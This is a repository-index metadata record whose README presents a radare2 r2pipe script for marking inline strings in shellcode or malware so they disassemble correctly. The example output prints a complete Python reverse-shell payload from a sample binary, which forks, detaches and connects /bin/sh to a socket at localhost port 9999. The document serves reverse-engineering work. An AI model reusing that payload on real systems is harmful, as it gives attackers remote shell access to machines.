{"id":16714041,"url":"https://github.com/therealdreg/call_trick_r2pipe","last_synced_at":"2026-01-02T12:33:27.826Z","repository":{"id":97023188,"uuid":"314521729","full_name":"therealdreg/call_trick_r2pipe","owner":"therealdreg","description":"radare2 script to fix disasm with call tricks for strings ","archived":false,"fork":false,"pushed_at":"2023-08-11T06:22:26.000Z","size":142,"stargazers_count":6,"open_issues_count":0,"forks_count":3,"subscribers_count":4,"default_branch":"main","last_synced_at":"2025-01-21T21:30:12.318Z","etag":null,"topics":["debugging","debugging-tool","r2pipe","radare2","reverse-engineering"],"latest_commit_sha":null,"homepage":"https://rootkit.es/","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/therealdreg.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"github":["therealdreg"],"patreon":"dreg","custom":["https://www.paypal.me/therealdreg","https://www.paypal.me/therealdreg"]}},"created_at":"2020-11-20T10:33:38.000Z","updated_at":"2023-07-26T07:28:17.000Z","dependencies_parsed_at":null,"dependency_job_id":"ec5245d8-9599-4749-80b9-ef9db461c377","html_url":"https://github.com/therealdreg/call_trick_r2pipe","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/therealdreg%2Fcall_trick_r2pipe","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/therealdreg%2Fcall_trick_r2pipe/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/therealdreg%2Fcall_trick_r2pipe/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/therealdreg%2Fcall_trick_r2pipe/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/therealdreg","download_url":"https://codeload.github.com/therealdreg/call_trick_r2pipe/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243690893,"owners_count":20331869,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["debugging","debugging-tool","r2pipe","radare2","reverse-engineering"],"created_at":"2024-10-12T20:48:58.673Z","updated_at":"2026-01-02T12:33:27.778Z","avatar_url":"https://github.com/therealdreg.png","language":null,"funding_links":["https://github.com/sponsors/therealdreg","https://patreon.com/dreg","https://www.paypal.me/therealdreg"],"categories":[],"sub_categories":[],"readme":"Please, consider make a donation: https://github.com/sponsors/therealdreg\n\n# call_trick_r2pipe\n\nAre you using radare for reversing or debugging a shellcode/malware with a lot of call tricks for strings like these:\n\n```\ncall @f\ndb \"string1\",0\n@f:\nmore code\ncall @g:\ndb \"string2\",0\n@g:\nmore code\n```\n\nTry this r2pipe (https://www.radare.org/n/r2pipe.html) script to fix disasm:\n ```\n#!/usr/bin/env python3\n# run inside r2 session: #!pipe python3 poc.py\n\nimport r2pipe\n\nr2 = r2pipe.open()\nprint(r2.cmd(\"izz\"))\nfor e in r2.cmdj(\"izzj\"):\n       if e['type'] == \"ascii\" and e['section'] == \".text\":\n               # csa = f\"Csa {e['size']} @ { e['vaddr']}\"\n               csa = \"Csa \" + str(e['size']) + \" @\" + str(e['vaddr'])\n               print(csa)\n               r2.cmd(csa)\n```\n\nThis script search all C-STRING-STYLE in .text section and mark each one like string \n\nJust use this script with \"#!pipe python3 poc.py\" command inside your r2 session:\n```\ndreg@fr33project:~# r2 64sudorevshell\n[0x00401000]\u003e #!pipe python3 poc.py\n[Strings]\nnth paddr      vaddr      len size section   type  string\n---------------------------------------------------------\n0   0x0000105a 0x0040105a 524 525  .text     ascii exec(\"\"\"\\nimport socket,subprocess,os,sys\\n\\npidrg = os.fork()\\nif pidrg \u003e 0:\\n        sys.exit(0)\\n\\nos.chdir(\"/\")\\n\\nos.setsid()\\n\\nos.umask(0)\\n\\ndrgpid = os.fork()\\nif drgpid \u003e 0:\\n        sys.exit(0)\\n\\nsys.stdout.flush()\\n\\nsys.stderr.flush()\\n\\nfdreg = open(\"/dev/null\", \"w\")\\n\\nsys.stdout = fdreg\\n\\nsys.stderr = fdreg\\n\\nsdregs=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\\n\\nsdregs.connect((str(0x7f000001),9999))\\n\\nos.dup2(sdregs.fileno(),0)\\n\\nos.dup2(sdregs.fileno(),1)\\n\\nos.dup2(sdregs.fileno(),2)\\n\\np=subprocess.call([\"/bin/sh\",\"-i\"])\\n\"\"\")\n1   0x00001274 0x00401274 11  12   .text     ascii /bin/python\n2   0x000012b7 0x004012b7 9   10   .text     ascii /bin/sudo\n3   0x00001479 0x00000001 18  19   .strtab   ascii 64sudorevshell.asm\n4   0x0000148c 0x00000014 6   7    .strtab   ascii parent\n5   0x00001493 0x0000001b 5   6    .strtab   ascii child\n6   0x00001499 0x00000021 4   5    .strtab   ascii arg3\n7   0x000014a2 0x0000002a 4   5    .strtab   ascii arg2\n8   0x000014ab 0x00000033 4   5    .strtab   ascii arg1\n9   0x000014b0 0x00000038 4   5    .strtab   ascii drgs\n10  0x000014b9 0x00000041 6   7    .strtab   ascii end_sc\n11  0x000014c0 0x00000048 11  12   .strtab   ascii __bss_start\n12  0x000014cc 0x00000054 6   7    .strtab   ascii _edata\n13  0x000014d3 0x0000005b 4   5    .strtab   ascii _end\n14  0x000014d9 0x00000001 7   8    .shstrtab ascii .symtab\n15  0x000014e1 0x00000009 7   8    .shstrtab ascii .strtab\n16  0x000014e9 0x00000011 9   10   .shstrtab ascii .shstrtab\n17  0x000014f3 0x0000001b 18  19   .shstrtab ascii .note.gnu.property\n18  0x00001506 0x0000002e 5   6    .shstrtab ascii .text\n\n\nCsa 525 @4198490\nCsa 12 @4199028\nCsa 10 @4199095\n[0x00401000]\u003e\n```\n\n# Before\n\n![alt text](before.png)\n\n# After\n\n![alt text](after.png)\n\nGreetz to Maijin for hints in #radare channel\n           \n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftherealdreg%2Fcall_trick_r2pipe","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ftherealdreg%2Fcall_trick_r2pipe","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftherealdreg%2Fcall_trick_r2pipe/lists"}